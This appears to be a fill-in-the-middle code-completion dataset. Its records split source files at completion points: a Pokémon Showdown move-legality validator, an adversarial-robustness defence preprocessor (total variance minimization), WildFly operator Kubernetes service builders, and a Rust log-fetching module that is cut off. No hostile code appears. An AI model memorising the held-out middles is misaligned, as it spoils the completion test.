			if (source.charAt(1) === 'E') {
				if (babyEvo && source.slice(2) === babyEvo) return false;
			}
			if (source.charAt(1) === 'D') {
				if (babyEvo && source.slice(2) === babyEvo) return false;
			}
			return true;
		});
		if (!setSources.size()) {
			problems.push(`${name}'s event/egg moves are from an evolution, and are incompatible with its moves from ${baby.name}.`);
		}
	}
	if (setSources.babyOnly && setSources.size() && this.gen > 2) {
		// there do theoretically exist evo/tradeback incompatibilities in
		// gen 2, but those are very complicated to validate and should be
		// handled separately anyway, so for now we just treat them all as
		// legal (competitively relevant ones can be manually banned)
		const baby = dex.getSpecies(setSources.babyOnly);
		setSources.sources = setSources.sources.filter(source => {
			if (baby.gen > parseInt(source.charAt(0)) && !source.startsWith('1ST')) return false;
			if (baby.gen > 2 && source === '7V') return false;
			return true;
		});
		if (setSources.sourcesBefore < baby.gen) setSources.sourcesBefore = 0;
		if (!setSources.size()) {
			problems.push(`${name} has moves from before Gen ${baby.gen}, which are incompatible with its moves from ${baby.name}.`);
		}
	}
	return problems;
}
/** Returns null if you can learn the move, or a string explaining why you can't learn it */
checkCanLearn(
	move: Move,
	s: Species,
	setSources = this.allSources(s),
	set: Partial<PokemonSet> = {}
): string | null {
	const dex = this.dex;
	if (!setSources.size()) throw new Error(`Bad sources passed to checkCanLearn`);
	move = dex.getMove(move);
	const moveid = move.id;
	const baseSpecies = dex.getSpecies(s);
	let species: Species | null = baseSpecies;
	const format = this.format;
	const ruleTable = dex.getRuleTable(format);
	const alreadyChecked: {[k: string]: boolean} = {};
	const level = set.level || 100;
	let cantLearnReason = null;
	let limit1 = true;
	let sketch = false;
	let blockedHM = false;
	let babyOnly = '';
	// This is a pretty complicated algorithm
	// Abstractly, what it does is construct the union of sets of all
	// possible ways this pokemon could be obtained, and then intersect
	// it with the pokemon's existing set of all possible ways it could
	// be obtained. If this intersection is non-empty, the move is legal.
	// set of possible sources of a pokemon with this move
	const moveSources = new PokemonSources();
	/**
	 * The format doesn't allow Pokemon traded from the future
	 * (This is everything except in Gen 1 Tradeback)
	 */
	const noFutureGen = !ruleTable.has('allowtradeback');
	let tradebackEligible = false;
	// Walk the evolutionary/forme chain, merging each stage's learnset sources.
	while (species?.name && !alreadyChecked[species.id]) {
		alreadyChecked[species.id] = true;
		if (dex.gen <= 2 && species.gen === 1) tradebackEligible = true;
		const lsetData = dex.getLearnsetData(species.id);
		if (!lsetData.learnset) {
			if ((species.changesFrom || species.baseSpecies) !== species.name) {
				// forme without its own learnset
				species = dex.getSpecies(species.changesFrom || species.baseSpecies);
				// warning: formes with their own learnset, like Wormadam, should NOT
				// inherit from their base forme unless they're freely switchable
				continue;
			}
			if (species.isNonstandard) {
				// It's normal for a nonstandard species not to have learnset data
				// Formats should replace the `Obtainable Moves` rule if they want to
				// allow pokemon without learnsets.
				return ` can't learn any moves at all.`;
			}
			// should never happen
			throw new Error(`Species with no learnset data: ${species.id}`);
		}
		const checkingPrevo = species.baseSpecies !== s.baseSpecies;
		if (checkingPrevo && !moveSources.size()) {
			if (!setSources.babyOnly || !species.prevo) {
				babyOnly = species.id;
			}
		}
		let lset = lsetData.learnset[moveid];
		if (moveid === 'sketch') {
			sketch = true;
		} else if (lsetData.learnset['sketch']) {
			if (move.noSketch || move.isZ || move.isMax) {
				cantLearnReason = `can't be Sketched.`;
			} else if (move.gen > 7 && !ruleTable.has('standardnatdex')) {
				cantLearnReason = `can't be Sketched because it's a Gen 8 move and Sketch isn't available in Gen 8.`;
			} else {
				if (!lset) sketch = true;
				lset = lsetData.learnset['sketch'].concat(lset || []);
			}
		}
		if (typeof lset === 'string') lset = [lset];
		if (lset) {
			for (let learned of lset) {
				// Every `learned` represents a single way a pokemon might
				// learn a move. This can be handled one of several ways:
				// `continue`
				//   means we can't learn it
				// `return null`
				//   means we can learn it with no restrictions
				//   (there's a way to just teach any pokemon of this species
				//   the move in the current gen, like a TM.)
				// `moveSources.add(source)`
				//   means we can learn it only if obtained that exact way described
				//   in source
				// `moveSources.addGen(learnedGen)`
				//   means we can learn it only if obtained at or before learnedGen
				//   (i.e. get the pokemon however you want, transfer to that gen,
				//   teach it, and transfer it to the current gen.)
				const learnedGen = parseInt(learned.charAt(0));
				if (learnedGen < this.minSourceGen) {
					if (!cantLearnReason) {
						cantLearnReason = `can't be transferred from Gen ${learnedGen} to ${this.minSourceGen}.`;
					}
					continue;
				}
				if (noFutureGen && learnedGen > dex.gen) {
					if (!cantLearnReason) {
						cantLearnReason = `can't be transferred from Gen ${learnedGen} to ${dex.gen}.`;
					}
					continue;
				}
				// redundant
				if (learnedGen <= moveSources.sourcesBefore) continue;
				const canUseAbilityPatch = dex.gen >= 8 && format.mod !== 'gen8dlc1';
				if (
					learnedGen < 7 && setSources.isHidden && !canUseAbilityPatch &&
					!dex.mod('gen' + learnedGen).getSpecies(baseSpecies.name).abilities['H']
				) {
					cantLearnReason = `can only be learned in gens without Hidden Abilities.`;
					continue;
				}
				if (!species.isNonstandard) {
					// HMs can't be transferred
					if (dex.gen >= 4 && learnedGen <= 3 && [
						'cut', 'fly', 'surf', 'strength', 'flash', 'rocksmash', 'waterfall', 'dive',
					].includes(moveid)) {
						cantLearnReason = `can't be transferred from Gen 3 to 4 because it's an HM move.`;
						continue;
					}
					if (dex.gen >= 5 && learnedGen <= 4 && [
						'cut', 'fly', 'surf', 'strength', 'rocksmash', 'waterfall', 'rockclimb',
					].includes(moveid)) {
						// Bugfix: this branch covers the Gen 4 -> 5 transfer (not 3 -> 4),
						// matching the Defog/Whirlpool message below.
						cantLearnReason = `can't be transferred from Gen 4 to 5 because it's an HM move.`;
						continue;
					}
					// Defog and Whirlpool can't be transferred together
					if (dex.gen >= 5 && ['defog', 'whirlpool'].includes(moveid) && learnedGen <= 4) blockedHM = true;
				}
				if (learned.charAt(1) === 'L') {
					// special checking for level-up moves
					if (level >= parseInt(learned.substr(2)) || learnedGen === 7) {
						// we're past the required level to learn it
						// (gen 7 level-up moves can be relearned at any level)
						// falls through to LMT check below
					} else if (level >= 5 && learnedGen === 3 && species.canHatch) {
						// Pomeg Glitch
					} else if ((!species.gender || species.gender === 'F') && learnedGen >= 2 && species.canHatch) {
						// available as egg move
						learned = learnedGen + 'Eany';
						// falls through to E check below
					} else {
						// this move is unavailable, skip it
						cantLearnReason = `is learned at level ${parseInt(learned.substr(2))}.`;
						continue;
					}
				}
				// Gen 8 egg moves can be taught to any pokemon from any source
				if (learned === '8E' || 'LMTR'.includes(learned.charAt(1))) {
					if (learnedGen === dex.gen && learned.charAt(1) !== 'R') {
						// current-gen level-up, TM or tutor moves:
						// always available
						if (learned !== '8E' && babyOnly) setSources.babyOnly = babyOnly;
						if (!moveSources.moveEvoCarryCount) return null;
					}
					// past-gen level-up, TM, or tutor moves:
					// available as long as the source gen was or was before this gen
					if (learned.charAt(1) === 'R') {
						moveSources.restrictedMove = moveid;
					}
					limit1 = false;
					moveSources.addGen(learnedGen);
				} else if (learned.charAt(1) === 'E') {
					// egg moves:
					// only if hatched from an egg
					let limitedEggMove: ID | null | undefined = undefined;
					if (learned.slice(1) === 'Eany') {
						limitedEggMove = null;
					} else if (learnedGen < 6) {
						limitedEggMove = move.id;
					}
					learned = learnedGen + 'E' + (species.prevo ? species.id : '');
					if (tradebackEligible && learnedGen === 2 && move.gen <= 1) {
						// can tradeback
						moveSources.add('1ET' + learned.slice(2));
					}
					moveSources.add(learned, limitedEggMove);
				} else if (learned.charAt(1) === 'S') {
					// event moves:
					// only if that was the source
					// Event Pokémon:
					// Available as long as the past gen can get the Pokémon and then trade it back.
					if (tradebackEligible && learnedGen === 2 && move.gen <= 1) {
						// can tradeback
						moveSources.add('1ST' + learned.slice(2) + ' ' + species.id);
					}
					moveSources.add(learned + ' ' + species.id);
				} else if (learned.charAt(1) === 'D') {
					// DW moves:
					// only if that was the source
					moveSources.add(learned + species.id);
				} else if (learned.charAt(1) === 'V' && this.minSourceGen < learnedGen) {
					// Virtual Console or Let's Go transfer moves:
					// only if that was the source
					moveSources.add(learned);
				}
			}
		}
		if (ruleTable.has('mimicglitch') && species.gen < 5) {
			// include the Mimic Glitch when checking this mon's learnset
			const glitchMoves = ['metronome', 'copycat', 'transform', 'mimic', 'assist'];
			let getGlitch = false;
			for (const i of glitchMoves) {
				if (lsetData.learnset[i]) {
					if (!(i === 'mimic' && dex.getAbility(set.ability).gen === 4 && !species.prevo)) {
						getGlitch = true;
						break;
					}
				}
			}
			if (getGlitch) {
				moveSources.addGen(4);
				if (move.gen < 5) {
					limit1 = false;
				}
			}
		}
		if (!moveSources.size()) {
			if (
				(species.evoType === 'levelMove' && species.evoMove !== move.name) ||
				(species.id === 'sylveon' && move.type !== 'Fairy')
			) {
				moveSources.moveEvoCarryCount = 1;
			}
		}
		// also check to see if the mon's prevo or freely switchable formes can learn this move
		species = this.learnsetParent(species);
	}
	if (limit1 && sketch) {
		// limit 1 sketch move
		if (setSources.sketchMove) {
			return ` can't Sketch ${move.name} and ${setSources.sketchMove} because it can only Sketch 1 move.`;
		}
		setSources.sketchMove = move.name;
	}
	if (blockedHM) {
		// Limit one of Defog/Whirlpool to be transferred
		if (setSources.hm) return ` can't simultaneously transfer Defog and Whirlpool from Gen 4 to 5.`;
		setSources.hm = moveid;
	}
	if (!setSources.restrictiveMoves) {
		setSources.restrictiveMoves = [];
	}
	setSources.restrictiveMoves.push(move.name);
	// Now that we have our list of possible sources, intersect it with the current list
	if (!moveSources.size()) {
		if (cantLearnReason) return `'s move ${move.name} ${cantLearnReason}`;
		return ` can't learn ${move.name}.`;
	}
	setSources.intersectWith(moveSources);
	if (!setSources.size()) {
		return `'s moves ${(setSources.restrictiveMoves || []).join(', ')} are incompatible.`;
	}
	if (babyOnly) setSources.babyOnly = babyOnly;
	return null;
}
/**
 * Returns the next species whose learnset should also be searched for this
 * Pokemon (prevo or base forme), or null when the chain ends.
 */
learnsetParent(species: Species) {
	// Own Tempo Rockruff and Battle Bond Greninja are special event formes
	// that are visually indistinguishable from their base forme but have
	// different learnsets. To prevent a leak, we make them show up as their
	// base forme, but hardcode their learnsets into Rockruff-Dusk and
	// Greninja-Ash
	const sharesBaseLearnset =
		(species.baseSpecies === 'Gastrodon' || species.baseSpecies === 'Pumpkaboo') && species.forme;
	if (sharesBaseLearnset) return this.dex.getSpecies(species.baseSpecies);
	if (species.name === 'Lycanroc-Dusk') return this.dex.getSpecies('Rockruff-Dusk');
	if (species.name === 'Greninja-Ash') return null;
	if (species.prevo) {
		// there used to be a check for Hidden Ability here, but apparently it's unnecessary
		// Shed Skin Pupitar can definitely evolve into Unnerve Tyranitar
		const prevo = this.dex.getSpecies(species.prevo);
		if (prevo.gen > Math.max(2, this.dex.gen)) return null;
		return prevo;
	}
	if (species.changesFrom && species.baseSpecies !== 'Kyurem') {
		// For Pokemon like Rotom and Necrozma whose movesets are extensions of their base formes
		return this.dex.getSpecies(species.changesFrom);
	}
	return null;
}
/**
 * Expands a sparse stats table into a complete StatsTable, filling any
 * missing (or non-numeric) entries with `fillNum`.
 */
static fillStats(stats: SparseStatsTable | null, fillNum = 0): StatsTable {
	const result: StatsTable = {hp: fillNum, atk: fillNum, def: fillNum, spa: fillNum, spd: fillNum, spe: fillNum};
	if (!stats) return result;
	let key: StatName;
	for (key in result) {
		const value = stats[key];
		// Copy only entries that are actually present as numbers.
		if (typeof value === 'number') result[key] = value;
	}
	return result;
}
/** Convenience factory: builds a new TeamValidator for the given format. */
static get(format: string | Format) {
	return new TeamValidator(format);
}
}
| okemonSources |
variance_minimization.py | # MIT License
#
# Copyright (C) The Adversarial Robustness Toolbox (ART) Authors 2018
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module implements the total variance minimization defence `TotalVarMin`.
| Paper link: https://openreview.net/forum?id=SyJ7ClWCb
| Please keep in mind the limitations of defences. For more information on the limitations of this defence,
see https://arxiv.org/abs/1802.00420 . For details on how to evaluate classifier security in general, see
https://arxiv.org/abs/1902.06705
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
from typing import Optional, Tuple, TYPE_CHECKING
import numpy as np
from scipy.optimize import minimize
from tqdm import tqdm
from art.config import ART_NUMPY_DTYPE
from art.defences.preprocessor.preprocessor import Preprocessor
if TYPE_CHECKING:
from art.utils import CLIP_VALUES_TYPE
logger = logging.getLogger(__name__)
class TotalVarMin(Preprocessor):
"""
Implement the total variance minimization defence approach.
| Paper link: https://openreview.net/forum?id=SyJ7ClWCb
| Please keep in mind the limitations of defences. For more information on the limitations of this
defence, see https://arxiv.org/abs/1802.00420 . For details on how to evaluate classifier security in general,
see https://arxiv.org/abs/1902.06705
"""
params = ["prob", "norm", "lamb", "solver", "max_iter", "clip_values", "verbose"]
def __init__(
self,
prob: float = 0.3,
norm: int = 2,
lamb: float = 0.5,
solver: str = "L-BFGS-B",
max_iter: int = 10,
clip_values: Optional["CLIP_VALUES_TYPE"] = None,
apply_fit: bool = False,
apply_predict: bool = True,
verbose: bool = False,
):
|
def __call__(self, x: np.ndarray, y: Optional[np.ndarray] = None) -> Tuple[np.ndarray, Optional[np.ndarray]]:
    """
    Apply total variance minimization to sample `x`.

    :param x: Sample to compress with shape `(batch_size, width, height, depth)`.
    :param y: Labels of the sample `x`. This function does not affect them in any way.
    :return: Similar samples.
    """
    if len(x.shape) == 2:
        raise ValueError(
            "Feature vectors detected. Variance minimization can only be applied to data with spatial dimensions."
        )
    result = x.copy()
    # Optimize each sample independently; a Bernoulli mask picks the pixels
    # whose values are kept in the data-fidelity term.
    progress = tqdm(result, desc="Variance minimization", disable=not self.verbose)
    for index, sample in enumerate(progress):
        keep_mask = (np.random.rand(*sample.shape) < self.prob).astype("int")
        result[index] = self._minimize(sample, keep_mask)
    if self.clip_values is not None:
        np.clip(result, self.clip_values[0], self.clip_values[1], out=result)
    return result.astype(ART_NUMPY_DTYPE), y
def _minimize(self, x: np.ndarray, mask: np.ndarray) -> np.ndarray:
    """
    Minimize the total variance objective function.

    :param x: Original image.
    :param mask: A matrix that decides which points are kept.
    :return: A new image.
    """
    z_min = x.copy()
    # Each channel is optimized independently on its flattened 2-D slice.
    num_channels = x.shape[2]
    for channel in range(num_channels):
        channel_shape = z_min[:, :, channel].shape
        solution = minimize(
            self._loss_func,
            z_min[:, :, channel].flatten(),
            (x[:, :, channel], mask[:, :, channel], self.norm, self.lamb),
            method=self.solver,
            jac=self._deri_loss_func,
            options={"maxiter": self.max_iter},
        )
        z_min[:, :, channel] = np.reshape(solution.x, channel_shape)
    return z_min
@staticmethod
def _loss_func(z_init: np.ndarray, x: np.ndarray, mask: np.ndarray, norm: int, lamb: float) -> float:
    """
    Loss function to be minimized.

    :param z_init: Initial guess.
    :param x: Original image.
    :param mask: A matrix that decides which points are kept.
    :param norm: The norm (positive integer).
    :param lamb: The lambda parameter in the objective function.
    :return: Loss value.
    """
    # Masked data-fidelity term: only pixels selected by the mask contribute.
    residual = z_init - x.flatten()
    fidelity = np.sqrt(np.power(residual, 2).dot(mask.flatten()))
    # Total-variation terms over vertical and horizontal finite differences.
    z_image = np.reshape(z_init, x.shape)
    tv_rows = np.linalg.norm(z_image[1:, :] - z_image[:-1, :], norm, axis=1).sum()
    tv_cols = np.linalg.norm(z_image[:, 1:] - z_image[:, :-1], norm, axis=0).sum()
    # Same accumulation order as fidelity + lamb*tv_rows, then + lamb*tv_cols.
    return fidelity + lamb * tv_rows + lamb * tv_cols
@staticmethod
def _deri_loss_func(z_init: np.ndarray, x: np.ndarray, mask: np.ndarray, norm: int, lamb: float) -> np.ndarray:
    """
    Derivative of loss function to be minimized.

    :param z_init: Initial guess (flattened image channel).
    :param x: Original image.
    :param mask: A matrix that decides which points are kept.
    :param norm: The norm (positive integer).
    :param lamb: The lambda parameter in the objective function.
    :return: Flattened gradient of the loss with respect to `z_init`.
    """
    # First compute the derivative of the first component of the loss function
    nor1 = np.sqrt(np.power(z_init - x.flatten(), 2).dot(mask.flatten()))
    # Guard against division by zero when the masked residual is (near) zero.
    if nor1 < 1e-6:
        nor1 = 1e-6
    der1 = ((z_init - x.flatten()) * mask.flatten()) / (nor1 * 1.0)
    # Then compute the derivative of the second component of the loss function
    z_init = np.reshape(z_init, x.shape)
    if norm == 1:
        # L1 norm: the (sub)gradient is the sign of the finite differences.
        z_d1 = np.sign(z_init[1:, :] - z_init[:-1, :])
        z_d2 = np.sign(z_init[:, 1:] - z_init[:, :-1])
    else:
        z_d1_norm = np.power(np.linalg.norm(z_init[1:, :] - z_init[:-1, :], norm, axis=1), norm - 1)
        z_d2_norm = np.power(np.linalg.norm(z_init[:, 1:] - z_init[:, :-1], norm, axis=0), norm - 1)
        # Clamp tiny norms to avoid division by zero for flat rows/columns.
        z_d1_norm[z_d1_norm < 1e-6] = 1e-6
        z_d2_norm[z_d2_norm < 1e-6] = 1e-6
        z_d1_norm = np.repeat(z_d1_norm[:, np.newaxis], z_init.shape[1], axis=1)
        z_d2_norm = np.repeat(z_d2_norm[np.newaxis, :], z_init.shape[0], axis=0)
        z_d1 = norm * np.power(z_init[1:, :] - z_init[:-1, :], norm - 1) / z_d1_norm
        z_d2 = norm * np.power(z_init[:, 1:] - z_init[:, :-1], norm - 1) / z_d2_norm
    # Each finite difference contributes to both of its endpoint pixels,
    # with opposite signs.
    der2 = np.zeros(z_init.shape)
    der2[:-1, :] -= z_d1
    der2[1:, :] += z_d1
    der2[:, :-1] -= z_d2
    der2[:, 1:] += z_d2
    der2 = lamb * der2.flatten()
    # Total derivative
    return der1 + der2
def _check_params(self) -> None:
    """
    Validate the defence parameters stored on the instance.

    :raises ValueError: If any parameter is out of range or of the wrong type.
    """
    if not isinstance(self.prob, (float, int)) or self.prob < 0.0 or self.prob > 1.0:
        logger.error("Probability must be between 0 and 1.")
        raise ValueError("Probability must be between 0 and 1.")
    # `np.int` was removed in NumPy 1.24; it was only an alias of the
    # built-in `int`, so checking `int` alone is equivalent and future-proof.
    if not isinstance(self.norm, int) or self.norm <= 0:
        logger.error("Norm must be a positive integer.")
        raise ValueError("Norm must be a positive integer.")
    if not (self.solver == "L-BFGS-B" or self.solver == "CG" or self.solver == "Newton-CG"):
        logger.error("Current support only L-BFGS-B, CG, Newton-CG.")
        raise ValueError("Current support only L-BFGS-B, CG, Newton-CG.")
    if not isinstance(self.max_iter, int) or self.max_iter <= 0:
        logger.error("Number of iterations must be a positive integer.")
        raise ValueError("Number of iterations must be a positive integer.")
    if self.clip_values is not None:
        if len(self.clip_values) != 2:
            raise ValueError("`clip_values` should be a tuple of 2 floats containing the allowed data range.")
        if np.array(self.clip_values[0] >= self.clip_values[1]).any():
            raise ValueError("Invalid `clip_values`: min >= max.")
    if not isinstance(self.verbose, bool):
        raise ValueError("The argument `verbose` has to be of type bool.")
| """
Create an instance of total variance minimization.
:param prob: Probability of the Bernoulli distribution.
:param norm: The norm (positive integer).
:param lamb: The lambda parameter in the objective function.
:param solver: Current support: `L-BFGS-B`, `CG`, `Newton-CG`.
:param max_iter: Maximum number of iterations when performing optimization.
:param clip_values: Tuple of the form `(min, max)` representing the minimum and maximum values allowed
for features.
:param apply_fit: True if applied during fitting/training.
:param apply_predict: True if applied during predicting.
:param verbose: Show progress bars.
"""
super().__init__(is_fitted=True, apply_fit=apply_fit, apply_predict=apply_predict)
self.prob = prob
self.norm = norm
self.lamb = lamb
self.solver = solver
self.max_iter = max_iter
self.clip_values = clip_values
self.verbose = verbose
self._check_params() |
service.go | package services
import (
wildflyv1alpha1 "github.com/wildfly/wildfly-operator/pkg/apis/wildfly/v1alpha1"
"github.com/wildfly/wildfly-operator/pkg/resources"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/types"
"sigs.k8s.io/controller-runtime/pkg/client"
logf "sigs.k8s.io/controller-runtime/pkg/log"
)
var log = logf.Log.WithName("wildflyserver_services")
// CreateOrUpdateAdminService creates an admin service or returns one up to date with the WildFlyServer.
func CreateOrUpdateAdminService(w *wildflyv1alpha1.WildFlyServer, client client.Client, scheme *runtime.Scheme, labels map[string]string) (*corev1.Service, error) {
	// Delegates to the shared helper, supplying the admin name and creator.
	return createOrUpdateService(w, client, scheme, labels, AdminServiceName(w), newAdminService)
}
// CreateOrUpdateHeadlessService creates a headless service or returns one up to date with the WildFlyServer.
func CreateOrUpdateHeadlessService(w *wildflyv1alpha1.WildFlyServer, client client.Client, scheme *runtime.Scheme,
	labels map[string]string) (*corev1.Service, error) {
	// Delegates to the shared helper, supplying the headless name and creator.
	return createOrUpdateService(w, client, scheme, labels, HeadlessServiceName(w), newHeadlessService)
}
// CreateOrUpdateClusterService creates a ClusterIP service or returns one up to date with the WildFlyServer.
func CreateOrUpdateClusterService(w *wildflyv1alpha1.WildFlyServer, client client.Client, scheme *runtime.Scheme, labels map[string]string) (*corev1.Service, error) {
	// Delegates to the shared helper, supplying the cluster name and creator.
	return createOrUpdateService(w, client, scheme, labels, ClusterServiceName(w), newClusterService)
}
// createOrUpdateService creates a service or returns one up to date with the WildflyServer.
// The serviceCreator function is responsible for the actual creation of the corev1.Service object.
func createOrUpdateService(w *wildflyv1alpha1.WildFlyServer, client client.Client, scheme *runtime.Scheme,
	labels map[string]string,
	serviceName string,
	serviceCreator func(*wildflyv1alpha1.WildFlyServer, map[string]string) *corev1.Service) (*corev1.Service, error) {
	// NOTE(review): this stamps the headless marker into the shared labels map for
	// EVERY service type (admin/headless/cluster), while newClusterService adds its
	// own loadbalancer marker. Looks like a copy-paste of newHeadlessService's line —
	// confirm whether non-headless services really need this marker in their selector.
	labels[resources.MarkerOperatedByHeadless] = resources.MarkerServiceActive // managing only active pods which are permitted to run EJB remote calls
	service := &corev1.Service{}
	err := resources.Get(w, types.NamespacedName{Name: serviceName, Namespace: w.Namespace}, client, service)
	if err != nil && !errors.IsNotFound(err) {
		return nil, err
	}
	// create the service if it is not found
	if errors.IsNotFound(err) {
		if err := resources.Create(w, client, scheme, serviceCreator(w, labels)); err != nil {
			if errors.IsAlreadyExists(err) {
				// Lost a race with another reconcile; nothing to do this pass.
				return nil, nil
			}
			return nil, err
		}
		// Returning nil signals the caller to requeue and re-read the new service.
		return nil, nil
	}
	// service is found, update it if it does not match the wildflyServer generation
	if !resources.IsCurrentGeneration(w, service) {
		newService := serviceCreator(w, labels)
		// copy the ClusterIP that was set after the route is created.
		newService.Spec.ClusterIP = service.Spec.ClusterIP
		service.Labels = labels
		service.Spec = newService.Spec
		if err := resources.Update(w, client, service); err != nil {
			if errors.IsInvalid(err) {
				// Can not update, so we delete to recreate the service from scratch
				if err := resources.Delete(w, client, service); err != nil {
					return nil, err
				}
				return nil, nil
			}
			return nil, err
		}
		return nil, nil
	}
	return service, nil
}
// newHeadlessService returns a headless (ClusterIP: None) service exposing the
// HTTP application port so pods are individually addressable.
func newHeadlessService(w *wildflyv1alpha1.WildFlyServer, labels map[string]string) *corev1.Service {
	labels[resources.MarkerOperatedByHeadless] = resources.MarkerServiceActive // managing only active pods which are permitted to run EJB remote calls
	headlessService := &corev1.Service{
		ObjectMeta: metav1.ObjectMeta{
			Name:      HeadlessServiceName(w),
			Namespace: w.Namespace,
			Labels:    labels,
		},
		Spec: corev1.ServiceSpec{
			Type:     corev1.ServiceTypeClusterIP,
			Selector: labels,
			// ClusterIPNone makes this a headless service: DNS resolves to pod IPs.
			ClusterIP: corev1.ClusterIPNone,
			Ports: []corev1.ServicePort{
				{
					Name: "http",
					Port: resources.HTTPApplicationPort,
				},
			},
		},
	}
	return headlessService
}
// newAdminService returns a service exposing the management port of WildFly
func | (w *wildflyv1alpha1.WildFlyServer, labels map[string]string) *corev1.Service {
headlessService := &corev1.Service{
ObjectMeta: metav1.ObjectMeta{
Name: AdminServiceName(w),
Namespace: w.Namespace,
Labels: labels,
},
Spec: corev1.ServiceSpec{
Type: corev1.ServiceTypeClusterIP,
Selector: labels,
ClusterIP: corev1.ClusterIPNone,
Ports: []corev1.ServicePort{
{
Name: "admin",
Port: resources.HTTPManagementPort,
},
},
},
}
return headlessService
}
// newClusterService returns a ClusterIP service exposing the HTTP application
// port, optionally with ClientIP session affinity.
func newClusterService(w *wildflyv1alpha1.WildFlyServer, labels map[string]string) *corev1.Service {
	labels[resources.MarkerOperatedByLoadbalancer] = resources.MarkerServiceActive // managing only active pods which are not in scaledown process
	// Sticky sessions: route a given client IP to the same pod when requested.
	sessionAffinity := corev1.ServiceAffinityNone
	if w.Spec.SessionAffinity {
		sessionAffinity = corev1.ServiceAffinityClientIP
	}
	loadBalancer := &corev1.Service{
		ObjectMeta: metav1.ObjectMeta{
			Name:      ClusterServiceName(w),
			Namespace: w.Namespace,
			Labels:    labels,
		},
		Spec: corev1.ServiceSpec{
			Type:            corev1.ServiceTypeClusterIP,
			Selector:        labels,
			SessionAffinity: sessionAffinity,
			Ports: []corev1.ServicePort{
				{
					Name: "http",
					Port: resources.HTTPApplicationPort,
				},
			},
		},
	}
	return loadBalancer
}
// HeadlessServiceName returns the name of the headless service for the given
// WildFlyServer, built as "<server name>-headless".
func HeadlessServiceName(w *wildflyv1alpha1.WildFlyServer) string {
	const suffix = "-headless"
	return w.Name + suffix
}
// AdminServiceName returns the name of the admin service for the given
// WildFlyServer, built as "<server name>-admin".
func AdminServiceName(w *wildflyv1alpha1.WildFlyServer) string {
	const suffix = "-admin"
	return w.Name + suffix
}
// ClusterServiceName returns the name of the cluster service.
//
// The service remains named with the -loadbalancer suffix for backwards compatibility
// even if it is now a ClusterIP service.
func ClusterServiceName(w *wildflyv1alpha1.WildFlyServer) string {
	return w.Name + "-loadbalancer"
}
| newAdminService |
logs.rs | // Copyright 2021 Databricks, Inc.
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use ansi_term::Colour::Yellow;
use chrono::offset::{Local, Utc};
use chrono::DateTime;
use clap::{App, Arg};
use k8s_openapi::api::core::v1 as api;
use reqwest::blocking::Response;
use rustyline::completion::Pair as RustlinePair;
use strfmt::strfmt;
use crate::{
command::command_def::{exec_match, start_clap, Cmd},
command::{parse_duration, valid_date, valid_duration, valid_u32},
completer,
env::Env,
error::ClickError,
kobj::{KObj, ObjType},
output::ClickWriter,
};
use std::cell::RefCell;
use std::collections::HashMap;
use std::convert::TryFrom;
use std::io::{BufRead, BufReader, Read, Write};
use std::path::PathBuf;
use std::sync::atomic::Ordering;
use std::sync::mpsc::{channel, RecvTimeoutError};
use std::thread;
use std::time::Duration;
// logs helper commands
/// Returns the name of the container whose logs should be fetched.
///
/// Pods may have several containers; this defaults to the first one and tells
/// the user when that choice was made. Panics (`unreachable!`) if `obj` is not
/// a pod, so callers must only pass pod objects.
fn pick_container<'a>(obj: &'a KObj, writer: &mut ClickWriter) -> &'a str {
    match obj.typ {
        ObjType::Pod { ref containers, .. } => {
            if containers.len() > 1 {
                clickwriteln!(writer, "Pod has multiple containers, picking the first one");
            }
            containers[0].as_str()
        }
        _ => unreachable!(),
    }
}
/// Streams everything from `reader` into a newly created file at `path`.
///
/// Stops early when the user hits ctrl-c (signalled via `env.ctrlcbool`) or
/// when the stream reports EOF (a zero-byte read). Flushes before returning.
#[allow(clippy::ptr_arg)]
fn write_logs_to_file(
    env: &Env,
    path: &PathBuf,
    mut reader: BufReader<Response>,
) -> Result<(), ClickError> {
    let mut file = std::fs::File::create(path)?;
    // Copy in 1 KiB chunks so ctrl-c is checked frequently.
    let mut buffer = [0; 1024];
    while !env.ctrlcbool.load(Ordering::SeqCst) {
        let amt = reader.read(&mut buffer[..])?;
        if amt == 0 {
            // EOF: the log stream has ended.
            break;
        }
        file.write_all(&buffer[0..amt])?;
    }
    file.flush().map_err(ClickError::from)
}
#[allow(clippy::too_many_arguments)]
fn | <'a>(
obj: &'a KObj,
env: &Env,
mut opts: api::ReadNamespacedPodLogOptional<'a>,
cont_opt: Option<&'a str>,
output_opt: Option<&str>,
editor: bool,
editor_opt: Option<&str>,
timeout: Option<Duration>,
writer: &mut ClickWriter,
) -> Result<(), ClickError> {
let cont = cont_opt.unwrap_or_else(|| pick_container(obj, writer));
opts.container = Some(cont);
let (request, _resp) =
api::Pod::read_namespaced_pod_log(obj.name(), obj.namespace.as_ref().unwrap(), opts)?;
let logs_reader_res = env.run_on_context(|c| c.execute_reader(request, timeout));
match logs_reader_res {
Ok(lreader) => {
let mut reader = BufReader::new(lreader);
env.ctrlcbool.store(false, Ordering::SeqCst);
if let Some(output) = output_opt {
